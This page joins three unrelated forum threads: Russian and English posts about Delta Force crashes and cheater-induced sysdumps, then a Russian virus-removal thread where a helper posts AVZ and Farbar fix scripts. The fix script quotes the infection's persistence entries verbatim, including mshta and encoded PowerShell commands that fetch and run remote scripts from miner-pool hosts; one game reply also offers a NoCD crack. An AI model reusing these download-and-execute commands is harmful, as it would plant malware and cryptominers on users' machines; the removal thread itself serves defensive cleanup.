Sysdump txt saved как исправить

Помогите, люди... :unknw: При запуске нет музыки, я кликая мышкой, выбираю солдата...а в меню только мультиплеер, а сингл недоступен. Помнится,...

Страница 2 из 7

  1. Помогите, люди… :unknw:
    При запуске нет музыки, я кликая мышкой, выбираю солдата…а в меню только мультиплеер, а сингл недоступен.
    Помнится, когда-то давно у меня эта игруха была, и такие проблемы возникали, когда отсутствовал диск. Но это лишь предположение.
    Очень хочется поиграть, а тут такое…
    Кстати ОС — Винда ХР СП1

  2. У меня была Delta Force, причём с нашего сайта и всё работало ок. А музыка там вырезана. Ты все файлы вроде setup и install запускал ?
    З.Ы. Может у кого игра есть на руках прояснит ситуацию .

  3. Был у меня как-то сборник, на котором жил Дельта Форс 1. Так вот там такая же байда была. Ни сингла, ни музыки не было. В конце концов оказалось, что это банальная мультиплеер-демо. Возможно, у тебя тоже самое.

    зыж Взал-то игру откуда?

  4. Тогда ХЗ. А там точно нет ничего наподобие носидишек или nfo-файлов?

  5. Kirka


    Kirka

    Регистрация:
    8 мар 2006
    Сообщения:
    1

    Аналогичная проблема.

    Sempron 2800+
    geforce px6600
    WinXP SP1 или win98SE
    не работает. зависает в начале загрузки. висит зеленый экран.
    обновил дрова под видеокарту — не помогло.
    может там конфиг нужно подправить? или пропатчить как-нить?

  6. vazelin


    vazelin

    Регистрация:
    17 мар 2006
    Сообщения:
    1

    Delta force, Вопрос

    Вопрос состоит вот в чем: режим кампании предусмотрен в выложенной версии? А то что-то как раз только эта кнопка затерта.

    А , не важно уже.
    Помог принцип виндовса : «не работает — выйди и зайди снова»

    Последнее редактирование: 17 мар 2006

  7. Delta Force: Land Warrior

    Помогите пожалуйста!Скачал,установил,запустил а он выдает
    «Unable to find file resources,missing CD?»и вылетает:cray: ЧЕ делать?

  8. VNEF


    VNEF

    Регистрация:
    6 авг 2006
    Сообщения:
    385

    Раз пишет «missing CD», значит ищи NOCD к игре

  9. Vita-c


    Vita-c

    Регистрация:
    13 мар 2007
    Сообщения:
    2

    Скачал с вашего сайта и запустил игру.
    после стартового лого на экране только интерфейс и ничего более
    ни надписей ни кнопок
    кароч чего делать

  10. Клонировать темы — нехорошо, это раз. Где описание проблемы? Это было два. Подразумеваю: что делали, чтобы запустить? Совместимость? Вполне возможно, что это видеокарта шалит, какие там у нее характеристики?

  11. Vita-c


    Vita-c

    Регистрация:
    13 мар 2007
    Сообщения:
    2

    извиняйте сразу не заметил старой темы

  12. Shkiv


    Shkiv

    Регистрация:
    23 авг 2007
    Сообщения:
    5

    winXP pro SP2
    celeron D 2400
    1 GB ram
    при повторном запуске виснет здесь:
    [​IMG]
    при первом запуске все было чудесно.
    пробовал выставлять совместимость с 95 и с 98, пробовал переносить на другой диск.

  13. Shkiv, со всех ли файлов в папке с игрой снят атрибут «только для чтения»?..

  14. Shkiv


    Shkiv

    Регистрация:
    23 авг 2007
    Сообщения:
    5

  15. VladiXXL


    VladiXXL

    Регистрация:
    4 окт 2007
    Сообщения:
    7

    Не запускается игра, первая часть.

    Pentium D, 2 GB, Geforce 7600 GS 256 MB, Windows XP SP2.
    Игра не хочет запускаться, виснет там где и у всех, то есть сразу после ролика на зеленом экране. Ни на одном файле в папке игры не стоит параметр Только чтение! Драйвера я обновлял пару раз, ставил атрибут под 98 Виндовс, всё равно та же проблема… Помогите пожалуйста. Игра установлена с пиратского сборника Вселенная ДФ.

  16. Hornet


    Hornet

    Регистрация:
    1 авг 2007
    Сообщения:
    703

    Скачал игру с сайта. Однако при втором или третьем запуске уперся в ту же проблему, что была у Kirka, Vita-c, Shkiv и
    VladiXXL. Опытным путем выяснилось, что повисает игра если щелкнуть мышью в заставке с логотипом игры. Если же «повисеть» в нем секунд пять, а затем давить мышь, то все работает отлично. Это если кто-то столкнется с такой проблемой — не паникуйте, а попробуйте еще раз, но неспеша.
    Еще бывает, хотя и оччень редко, что игра вылетает на ровном месте ничего не говоря об ошибке, с сообщением, что все записано в файл SYSDUMP.TXT. После чего наотрез отказывается запускаться ругаясь на отсутствие чего-то связанного с оружием. В файле SYSDUMP.TXT естественно ничего не понятно (там только адреса в памяти).
    Однако после ребута все снова работает нормально.


    Zenny, kreol и Каинхару нравится это.

  17. Aidhen


    Aidhen

    Регистрация:
    14 янв 2008
    Сообщения:
    1

    Проверено от зависания на стартовом экране помогает установка патча … например с ag.ru … но вот соло кампанию что-то запустить не получается… =( ни без патча ни с ним… просто клавиша неактивна =(

  18. Hornet


    Hornet

    Регистрация:
    1 авг 2007
    Сообщения:
    703

    На моей памяти такое случалось когда игра не обнаруживает свой диск в приводе…

    Но на сайте рип, поэтому не понятно откуда это взялось. Возможно наведено патчем, а возможно ты что-то забыл. Например запустить какой-нибудь .reg файл из папки с игрой или что-то вроде.
    В любом случае я поставил качаться, но с моим интернетом это займет минимум час…

    Добавлено через 2 часа 59 минут
    Ага, действительно патч полностью исправляет проблему с зависанием при загрузке списка персонажей.
    Насчет заблокированной одиночной игры все просто: после патча игра снова хочет родной диск. Вот тебе кряк (см. аттач) — распаковать в папку с пропатченной игрой и запустить, а он сам всё сделает. Всё можно играть!

    UPD:
    Я пропатчил скачанную с сайта игру (версия 1.00.00.05P) до 1.00.03.03P, отучил от диска, перепаковал и отправил Ноэлю — может он её такую зальет на сайт взамен той, что сейчас.

    Я проверил, что получилось на двух машинах: Athlon 64 X2 4400/MSI K9N Ultra-2F (nForce 570Ultra)/2Gb/8600GTS/Windows XP SP2 и
    Pentium 4 3GHz/Foxconn 915P7AD (i915P)/1Gb/Radeon X550/Windows Vista — всё работало отлично.

    Вложения:

    • Crack.zip
      Размер файла:
      11,7 КБ
      Просмотров:
      720

    Последнее редактирование: 15 янв 2008


    Zenny и kreol нравится это.

Страница 2 из 7


Форум Old-Games.RU. Всё о старых играх

Old

02-21-2004, 02:42 AM

Bustin's Avatar

DF2 Forever

Join Date: Jun 2002

Location: Massachusetts

Posts: 1,596

Sysdumps do NOT only happen when someone is cheating.

__________________
DF2 Forever!

Reply With Quote

Old

02-21-2004, 08:08 AM

Hellfighter's Avatar

Chief ADFP

Join Date: Jun 2002

Location: San Jose Calif 95111

Posts: 21,134

Send a message via ICQ to Hellfighter

call
tech-support 1-818-878-0325
Hours 9am-5pm west coast USA-Calif M-F.

and you can go to www.novaworld.com lookup tech support in the forum there, you do have to be a member of the site there so signup its a great site.

System dump do happen when there some jerk making other’s have a system dump in DF2 land i seen 15player at one time left only to come back and say they had a system dump and a fool cheater said he did it. so there are some who are making it so.

Normal a system dump: only happen when there something is bad a file or a map.

Not normal: when some one finds a way to upload fake system dump to other’s thier game believe it had a system dump. best way change the file to read only in properties of the system dump it block it from being change or updated.

best way to tell watch your firewall have it set to highist settings when playing DF2, its loaded with hackers and cheaters in them Nova-host game areas, play in public and password areas its in these area you will find great players in playing it fair & good sportmenship with others.

__________________
* altnews sources [getmo & others news] not found main FNN: realrawnews.com
*Discord: Unknown77#7121
Playing now days: EA Games> swtor [star wars old republic]


Last edited by Hellfighter; 02-21-2004 at 08:52 AM.

Reply With Quote

Old

02-21-2004, 08:59 AM

Registered User

Join Date: Jan 2004

Posts: 275

A quicker solution is that you download the 3rd file Here , the second file is also good, it brings some extra tools aswell. Anyways, getting offtopic, this file prevents you from getting a sys.dump from jerks (cheaters), so if you get a sys.dump its just a normal case.

*If you had a prior version of the file to be downloaded, uninstall it and install this one*

Also, its a great tool to shut the ppls mouth when they call you a cheat.

You can also see if your tools is working by going into these pages if your name appears in the server you are playing in, then your tool is working. Hope this can help you.

If you have problems in the installation or making the tool work click here

I hope this can help you.

__________________

—————-

Reply With Quote

Old

02-21-2004, 06:42 PM

Registered User

Join Date: Feb 2004

Posts: 1

what also helps, is install the game not in the standard root.
most sysdump cheats works only with the normal roots.

__________________

Reply With Quote

Old

02-21-2004, 10:49 PM

Thanks Everyone I’ll Try Them

__________________
CrAzYsNiPeR@ROTC.net

Reply With Quote

Old

02-22-2004, 03:56 AM

Umm Just In Case Some People Who Know How To Fix It Please Tell Me How You Fixed It Thank You.

__________________
CrAzYsNiPeR@ROTC.net

Reply With Quote

Old

02-22-2004, 11:46 AM

Registered User

Join Date: Feb 2002

Posts: 61

Send a message via ICQ to DeadBoltdf2

Crazy, the problem is there is no one answer. The NL game traps all errors and masks them into sysdump.txt messages. So, graphics, maps, video drivers, bad install, bad files, you name it can be the ultimate cause of the problem.

You will have to troubleshoot each one in turn (try searching on sysdump and video for a starter). Knock the possibilities off.

If you only happen to be sysdumping while in a NL hosted game (versus public or private) it *may* be related to someone using a game bug to cause you game to crash. If you are in a public game that is very unlikely. You would probably see other people getting dumped from the game as well.

Reply With Quote

Old

02-24-2004, 07:35 PM

Yea sometimes it happens on my comp with XP but its out of no where when I’m hosting a game. I just shake it off and start it up again.

Not really anything to worry about for me since it only happens about once every two days (if I leave the server up)

Don’t know if that’s even relavent but my message is that you probably shouldn’t worry about it if it’s not often that it happens. If it is often than like DeadBolt2 said, you just have to troubleshoot it.

You can goto a lot of your hardware manufacturer’s sites and find out if your computer is compatible.

It also may be your opperating system although I doubt it unless its XP because that’s what I have and it doesn’t like when I install updates and things like that.

Hope it helped :-)

__________________
Gen.*ATD*Woods

Reply With Quote

Old

02-25-2004, 12:47 AM

Hellfighter's Avatar

Chief ADFP

Join Date: Jun 2002

Location: San Jose Calif 95111

Posts: 21,134

Send a message via ICQ to Hellfighter

DF2 can be set to be use like windows 98 & windows Me inside your system you have a option for that windows Xp has a option call: Compatibility inside file Properties. i change DF: 1/2 to work as WIndows 98/Me in my WIndows Xp Pro SP1(OEM)

Here a sample to get it to work:
1.) find the shortcut to DF2 right click-on it lookup Properties click-on it.
2.) up top you see a Tab: Compatibility click-on it.
3.) Compatibility (hight-lited in blue) look under the wordings a [box] put a check mark into it, on the right see a pointer facing down click-on it. now move it till you see «Windows 98/Windows Me».
4.) now click-on «Apply» after click-on «Ok»

try to play the game see if you still get system dump.

it a option for older programs that microsoft made, a option for them who like to use old programs in Windows Xp Family & Windows 2003.

__________________
* altnews sources [getmo & others news] not found main FNN: realrawnews.com
*Discord: Unknown77#7121
Playing now days: EA Games> swtor [star wars old republic]


Last edited by Hellfighter; 02-25-2004 at 12:56 AM.

Reply With Quote

Old

02-27-2004, 05:01 PM

cool thanks

__________________
Gen.*ATD*Woods

Reply With Quote

Old

02-27-2004, 08:20 PM

Hellfighter's Avatar

Chief ADFP

Join Date: Jun 2002

Location: San Jose Calif 95111

Posts: 21,134

Send a message via ICQ to Hellfighter

you all so can change the game folder name:
From: Delta Force 2 To: DF2 only make a new shortcut of the df2.exe to your desktop and delete the old df2 shortcut you have. that will stop cheaters from loading you up with system dump. you can really rename the game folder anything you like only make a new shortcut to your df2.exe on your desktop. my Delta Force 2 folder i rename it: «piss-on» i don’t get no more system dumps from them jerks any more.

__________________
* altnews sources [getmo & others news] not found main FNN: realrawnews.com
*Discord: Unknown77#7121
Playing now days: EA Games> swtor [star wars old republic]

Reply With Quote

0 / 0 / 0

Регистрация: 10.02.2023

Сообщений: 24

1

Отключается, после перезагрузки обнаруживает вирусню

10.02.2023, 17:49. Показов 1147. Ответов 46


Доброго времени!

Началась история с «синего экрана смерти», вылезали дополнительные окна, телефония сходит с ума и начинает звонить.
Компьютер периодически самопроизвольно вырубается.
Помогите, пожалуйста, подлечиться!

__________________
Помощь в написании контрольных, курсовых и дипломных работ, диссертаций здесь



0



Вирусоборец

11119 / 6349 / 1316

Регистрация: 06.09.2009

Сообщений: 24,103

Вчера, 09:47

2

Выполните скрипт в AVZ из папки Autologger (запускать AVZ от имени Администратора по правой кнопке мыши)

Код

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 TerminateProcessByName('C:Windowsservices.exe');
 QuarantineFile('C:Windowsservices.exe','');
 DeleteFile('C:Windowsservices.exe','32');
 DeleteSchedulerTask('MicrosoftWindowsDiagnosisScheduledDiagnosis');
 DeleteSchedulerTask('MicrosoftWindowsMultimediaCodecUpdateTask');
 DeleteSchedulerTask('MicrosoftWindowsMultimediaSystemVideoService');
 DeleteSchedulerTask('MicrosoftWindowsSetUpd');
 DeleteSchedulerTask('MicrosoftWindowsShellWindowsParentalControlsSettings');
 DeleteSchedulerTask('MicrosoftWindowsTcpipIpAddressConflict');
 DeleteSchedulerTask('MicrosoftWindowsWDIUPD');
 DeleteSchedulerTask('MicrosoftWindowsWindows DefenderTask Update');
 DeleteSchedulerTask('MicrosoftWindowsWindows Filtering PlatformIP Filter');
 DeleteSchedulerTask('MicrosoftWindowsWindowsUpdateAUIFirmwareUpdate');
 DeleteSchedulerTask('MicrosoftWindows DefenderScannerSchduler');
 DeleteSchedulerTask('MicrosoftWindowsRasWinSockets');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(false);
end.

  • Обратите внимание: будет выполнена перезагрузка компьютера.

Выполните скрипт в AVZ

Код

begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine ./Quarantine/', 1, 0, true);
end.

Отправьте quarantine.7z из папки с распакованной утилитой AVZ с помощью формы отправки карантина или на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.

Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи.



0



0 / 0 / 0

Регистрация: 10.02.2023

Сообщений: 24

Вчера, 13:36

 [ТС]

3

Цитата
Сообщение от thyrex
Посмотреть сообщение

Отправьте quarantine.7z из папки с распакованной утилитой AVZ с помощью формы отправки карантина

Здравствуйте, честно говоря, не понял отправился ли файл карантина через форму…
Скрипты выполнил. Свежие логи прикрепляю



0



Вирусоборец

11119 / 6349 / 1316

Регистрация: 06.09.2009

Сообщений: 24,103

Вчера, 14:08

4

Скрипт лечения как-будто бы и не выполняли, а просто собрали новые логи.

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

  • Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan (Дополнительные опции) отмечены List BCD и 90 Days Files.
3. Нажмите кнопку Scan (Сканировать).
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.



0



0 / 0 / 0

Регистрация: 10.02.2023

Сообщений: 24

Вчера, 14:51

 [ТС]

5

Цитата
Сообщение от thyrex
Посмотреть сообщение

6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив)

Выполнил, файлы прилагаю



0



Вирусоборец

11119 / 6349 / 1316

Регистрация: 06.09.2009

Сообщений: 24,103

Вчера, 15:28

6

hidden (S-1-5-21-2281474314-2006405269-869121014-1007 — Administrator — Enabled)
Сервер (S-1-5-21-2281474314-2006405269-869121014-1000 — Administrator — Enabled) => C:UsersСервер

не много ли администраторов в системе?

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мышиКопировать)

Код

Start::
CreateRestorePoint:
CloseProcesses:
2023-02-11 12:42 - 2023-02-11 12:42 - 001631744 _____ () C:Windowsservices.exe
HKLMSOFTWAREMicrosoftWindows Defender: [DisableAntiSpyware] Ограничение <==== ВНИМАНИЕ
HKLMSOFTWAREPoliciesMicrosoftWindows Defender: Ограничение <==== ВНИМАНИЕ
HKUS-1-5-21-2281474314-2006405269-869121014-1000...MountPoints2: {8cbeef0b-f729-11e4-aa83-c03fd5b01dd7} - F:LGAutoRun.exe
HKUS-1-5-21-2281474314-2006405269-869121014-1000...MountPoints2: {963b99ae-1fe0-11e6-a773-c03fd5b01dd7} - F:AutoRun.exe
HKUS-1-5-21-2281474314-2006405269-869121014-1000...MountPoints2: {a023080d-a7c9-11e7-98f1-c03fd5b01dd7} - F:Setup.exe
HKUS-1-5-21-2281474314-2006405269-869121014-1000...MountPoints2: {a26743a1-7f1c-11e5-b829-c03fd5b01dd7} - F:AutoRun.exe
HKUS-1-5-21-2281474314-2006405269-869121014-1000...MountPoints2: {a26743af-7f1c-11e5-b829-c03fd5b01dd7} - F:AutoRun.exe
IFEONarrator.exe: [Debugger] notepad.exe
Task: {13794EAA-8D3D-4A5E-9902-13A61911FE5F} - System32TasksMicrosoftWindowsMultimediaCodecUpdateTask => cmd /c mshta hxxps://eu1.minerpool.pw/checks.hta <==== ВНИМАНИЕ
Task: {1AE1B560-F9EB-4DED-B302-A9CE53DB0DA6} - System32TasksMicrosoftWindowsShellWindowsParentalControlsSettings => cmd /c mshta hxxp://eu1.minerpool.pw/check.hta <==== ВНИМАНИЕ
Task: {1DA56D17-B587-445D-BD93-13D2A2906F75} - System32TasksMicrosoftWindowsRasWinSockets => c:windowsservices.exe [1631744 2023-02-11] () [Файл не подписан] <==== ВНИМАНИЕ
Task: {531ABC9A-C238-4524-81DD-82A7872EDBE6} - System32TasksMicrosoftWindowsWindows Filtering PlatformIP Filter => cmd /c mshta hxxps://v1.fym5gserobhh.pw/check.hta <==== ВНИМАНИЕ
Task: {611C3F21-69A2-4BC2-B2CF-3B95C0D3FCB3} - System32Tasks{2E207767-0636-4BAD-8C58-ADF08A8A961F} => C:Program Files (x86)GoogleChromeApplicationchrome.exe (Нет файла)
Task: {7936A2C4-06F2-4BB1-A236-E6E8A3077136} - System32TasksMicrosoftWindows DefenderScannerSchduler => cmd /c mshta hxxp://res1.myrms.pw/upd.hta <==== ВНИМАНИЕ
Task: {7C69F86C-26E4-4299-92DE-DCABDC14F4B8} - System32Tasks{12B0632F-498C-45E9-8C06-33B5556C077C} => C:Program Files (x86)2gis3.0grym.exe (Нет файла)
Task: {9C293E2A-ECC9-40B9-B61D-049A788F58F4} - System32TasksMicrosoftWindowsSetUpd => powershell -exec bypass -e QwA6AFwAVwBpAG4AZABvAHcAcwBcAEYAbwBuAHQAcwBcAGQAZQBsAC4AcABzADEA
Task: {A8142646-2C0A-448E-B645-B3962F152BE6} - System32Tasks{2102F20E-1A0A-46FF-AEF2-F48FB6048DE8} => C:Program Files (x86)2gis3.0grym.exe (Нет файла)
Task: {AFE46812-48B3-4F72-96C8-1E45DFC3970D} - System32TasksMicrosoftWindowsMultimediaSystemVideoService => cmd /c powershell -nop -noni -w 1 -enc cgBlAGcAcwB2AHIAMwAyACAALwB1ACAALwBzACAALwBpADoAaAB0AHQAcAA6AC8ALwAxADAANwAuADEAOAAxAC4AMQA4ADcALgAxADMAMgAvAHAAaABwAC8AZgB1AG4AYwAuAHAAaABwACAAcwBjAHIAbwBiAGoALgBkAGwAbAA= <==== ВНИМАНИЕ
Task: {B24F30AA-8A04-405C-BA4E-8BD51D832D75} - System32TasksMicrosoftWindowsWindows DefenderTask Update => cmd /c mshta hxxps://eu1.ax33y1mph.pw/check.hta <==== ВНИМАНИЕ
Task: {B7127608-2E5C-4138-AE5A-EE97403226EA} - System32TasksMicrosoftWindowsDiagnosisScheduledDiagnosis => cmd /c mshta hxxps://pa.kl2a48yh.pw/check.hta <==== ВНИМАНИЕ
Task: {B72DDA97-8BA5-4FD3-86AF-2CF34D71233E} - System32TasksMicrosoftWindowsTcpipIpAddressConflict => cmd /c mshta hxxp://107.181.187.132/check.hta <==== ВНИМАНИЕ
Task: {BE6F4FF7-F7B5-40EA-9E89-C7D0EE161D75} - System32Tasks{39EEBA3F-4B37-46C3-8879-002C1CEEABEB} => C:Program Files (x86)2gis3.0grym.exe (Нет файла)
Task: {C6267DF7-BBF3-4D91-ACCE-1519B07EB25A} - System32Tasks{AA794037-7185-42D6-98C2-0CFDF2C16C91} => C:Program Files (x86)GoogleChromeApplicationchrome.exe (Нет файла)
Task: {CA4DD0E4-F044-47ED-9E27-36212E756DBE} - System32Tasks{08357E36-721E-49E7-AE59-97094859396B} => C:Program Files (x86)2gis3.0grym.exe (Нет файла)
Task: {D427651E-B00A-4A87-B3F1-8696977C6297} - System32Tasks{7170677C-0E92-4376-965B-2BE709026004} => C:Program Files (x86)GoogleChromeApplicationchrome.exe (Нет файла)
Task: {D71C4498-C22D-474A-8AE6-93E729B8EBE6} - System32Tasks{23C96994-61A5-4E43-98C7-6C0F2BD6974A} => C:Program Files (x86)GoogleChromeApplicationchrome.exe (Нет файла)
Task: {DE80D380-CE68-4A84-AAF8-B6762AA2787E} - System32TasksMicrosoftWindowsWDIUPD => cmd /c mshta hxxp://eu1.minerpool.pw/upd.hta <==== ВНИМАНИЕ
Task: {E2159284-2F2B-44F8-91A3-9AA791AA4431} - System32TasksMicrosoftWindowsWindowsUpdateAUIFirmwareUpdate => cmd /c powershell -exec bypass -e cgBlAGcAcwB2AHIAMwAyACAALwB1ACAALwBzACAALwBpADoAaAB0AHQAcAA6AC8ALwB2ADEALgBmAHkAbQA1AGcAcwBlAHIAbwBiAGgAaAAuAHAAdwAvAHAAaABwAC8AZgB1AG4AYwAuAHAAaABwACAAcwBjAHIAbwBiAGoALgBkAGwAbAA= <==== ВНИМАНИЕ
IPSecPolicy: [ActivePolicy] SOFTWAREPoliciesMicrosoftWindowsIPSECPolicyLocalipsecPolicy{e55c33b7-823c-4870-a01a-3357954963ff} <==== ВНИМАНИЕ (Ограничение - IP)
S3 cli_optimization_v2.0.55728_32; cmd /c mshta hxxps://pa.kl2a48yh.pw/check.hta [X]
S2 cli_optimization_v2.0.55728_64; cmd /c mshta  hxxp://eu1.minerpool.pw/check.hta [X]
S3 cli_optimization_v2.0.56730_32; cmd /c powershell -exec bypass -Command iex ((New-Object System.Net.WebClient).DownloadString('hxxp://v1.fym5gserobhh.pw/v1/check1.ps1')) [X]
S3 cli_optimization_v2.0.56733_32; cmd /c powershell -w 1 -exec bypass -e aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AYQAuADYAdQA5ADkAcQB2ADAAYgAuAHMAdQAvAHYAMQAvAGMAaABlAGMAawAxAC4AcABzADEAIgApACkA [X]
C:ProgramDatacm-lock
2023-01-23 05:30 - 2023-01-23 05:30 - 000014544 _____ (OpenLibSys.org) C:Windowssystem32WinRing0x64.sys
WMI:subscription__FilterToConsumerBinding->CommandLineEventConsumer.Name="BVTConsumer"",Filter="__EventFilter.Name="BVTFilter"::
WMI:subscription__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscriptionCommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\tools\kernrate]
FirewallRules: [{211D1263-F3A4-463C-9A0B-8F44E2A4630A}] => (Allow) C:Program FilesCommon FilesMcAfeePlatformMcSvcHostMcSvHost.exe => Нет файла
FirewallRules: [{54E59627-31A2-4AA0-8682-151BD88516B1}] => (Allow) C:Program FilesCommon FilesMcAfeePlatformMcSvcHostMcSvHost.exe => Нет файла
FirewallRules: [TCP Query User{65F72A44-95A7-447F-95AB-2AC1A9BEAAEB}C:program files (x86)tmenterprise1tmdriverservertmdriverserver.exe] => (Allow) C:program files (x86)tmenterprise1tmdriverservertmdriverserver.exe => Нет файла
FirewallRules: [UDP Query User{DFF2E827-E32D-46C3-89A4-E6C5C7AED5D4}C:program files (x86)tmenterprise1tmdriverservertmdriverserver.exe] => (Allow) C:program files (x86)tmenterprise1tmdriverservertmdriverserver.exe => Нет файла
FirewallRules: [TCP Query User{753F6E65-70E9-4E2D-83DF-02EB8240692C}C:program files (x86)tmenterprise1tmserver.exe] => (Allow) C:program files (x86)tmenterprise1tmserver.exe => Нет файла
FirewallRules: [UDP Query User{65229595-5AF1-439F-A7ED-CEA361191253}C:program files (x86)tmenterprise1tmserver.exe] => (Allow) C:program files (x86)tmenterprise1tmserver.exe => Нет файла
FirewallRules: [TCP Query User{66B0C34A-DC5B-4699-983C-326215A0A95E}C:program files (x86)tmenterprise1tmdriverservertmdriverserver.exe] => (Allow) C:program files (x86)tmenterprise1tmdriverservertmdriverserver.exe => Нет файла
FirewallRules: [UDP Query User{F726F886-7F56-4E05-91DB-D65C0E4902BA}C:program files (x86)tmenterprise1tmdriverservertmdriverserver.exe] => (Allow) C:program files (x86)tmenterprise1tmdriverservertmdriverserver.exe => Нет файла
FirewallRules: [TCP Query User{B946E8B8-8118-4D0D-878C-89F9D816D8D0}C:program files (x86)tmenterprise1tmserver.exe] => (Allow) C:program files (x86)tmenterprise1tmserver.exe => Нет файла
FirewallRules: [UDP Query User{663650A9-A8C0-4CE8-8638-BD48A75200C1}C:program files (x86)tmenterprise1tmserver.exe] => (Allow) C:program files (x86)tmenterprise1tmserver.exe => Нет файла
FirewallRules: [{35A8EAFB-106B-4409-8DDF-1C33B04F3140}] => (Allow) C:Program FilesCommon FilesMcAfeePlatformMcSvcHostMcSvHost.exe => Нет файла
FirewallRules: [{A1DD20DB-E4CA-4DB7-8C5D-B6365E847268}] => (Allow) C:Program FilesCommon FilesMcAfeePlatformMcSvcHostMcSvHost.exe => Нет файла
FirewallRules: [{E5E53F8C-F7E8-4A97-A25B-9472ABFDB32F}] => (Allow) C:Program FilesBareosbareos-fd.exe => Нет файла
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

  • Обратите внимание: будет выполнена перезагрузка компьютера.



0



0 / 0 / 0

Регистрация: 10.02.2023

Сообщений: 24

Вчера, 16:09

 [ТС]

7

Цитата
Сообщение от thyrex
Посмотреть сообщение

не много ли администраторов в системе?

Хм…

Цитата
Сообщение от thyrex
Посмотреть сообщение

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мыши – Копировать)

Скопировал

Цитата
Сообщение от thyrex
Посмотреть сообщение

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

Запустил, нажал исправить. и похоже, что что-то я не так сделап((( вставить пункт 1 из списка, вероятно в строку поиска в программе нужно было



0



Вирусоборец

11119 / 6349 / 1316

Регистрация: 06.09.2009

Сообщений: 24,103

Вчера, 17:01

8

Цитата
Сообщение от Andrey_fav
Посмотреть сообщение

и похоже, что что-то я не так сделап

все нормально, скрипт отработал. Что с проблемой?



1



0 / 0 / 0

Регистрация: 10.02.2023

Сообщений: 24

Вчера, 17:06

 [ТС]

9

Цитата
Сообщение от thyrex
Посмотреть сообщение

все нормально, скрипт отработал. Что с проблемой?

Обнаружен загрузчик троянов антивирусом Donoff.A (не смотря на то, что защита в реальном времени — отключена)

Проблема вылезает не постоянно, но продолжает подсасывать вирусню(



0



Вирусоборец

11119 / 6349 / 1316

Регистрация: 06.09.2009

Сообщений: 24,103

Вчера, 17:21

10

Где обнаружен?



0



0 / 0 / 0

Регистрация: 10.02.2023

Сообщений: 24

Вчера, 17:33

 [ТС]

11

Цитата
Сообщение от thyrex
Посмотреть сообщение

Где обнаружен?

Вот

Сейчас логи подготовлю свежие. Загружу



0



0 / 0 / 0

Регистрация: 10.02.2023

Сообщений: 24

Вчера, 17:49

 [ТС]

12

Цитата
Сообщение от Andrey_fav
Посмотреть сообщение

Сейчас логи подготовлю свежие. Загружу

прикрепляю

Цитата
Сообщение от thyrex
Посмотреть сообщение

Что с проблемой?



0



Вирусоборец

11119 / 6349 / 1316

Регистрация: 06.09.2009

Сообщений: 24,103

Вчера, 17:49

13

Удалите старые логи FRST.txt и Addition.txt, еще раз запустите Farbar и сделайте новые логи.



0



0 / 0 / 0

Регистрация: 10.02.2023

Сообщений: 24

Вчера, 17:58

 [ТС]

14

Цитата
Сообщение от thyrex
Посмотреть сообщение

еще раз запустите Farbar и сделайте новые логи.

результаты сканирования из Farbar прислать?



0



0 / 0 / 0

Регистрация: 10.02.2023

Сообщений: 24

Вчера, 18:09

 [ТС]

15

Цитата
Сообщение от thyrex
Посмотреть сообщение

Удалите старые логи FRST.txt и Addition.txt, еще раз запустите Farbar и сделайте новые логи.

Свежие логи



0



Вирусоборец

11119 / 6349 / 1316

Регистрация: 06.09.2009

Сообщений: 24,103

Вчера, 18:22

16

Примите к сведению — после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мышиКопировать)

Код

Start::
CreateRestorePoint:
2023-02-11 17:36 - 2023-02-11 17:36 - 000000004 ____H C:ProgramDatacm-lock
NETSVC: MsF5E98B78App -> отсутствует путь к файлу.
Task: {0EB468F6-8053-48E2-9E26-A4EE5F0F5C8E} - System32TasksMicrosoftWindowsDiagnosisDiskDiagnostics => cmd /c sc start cli_optimization_v2.0.56733_32
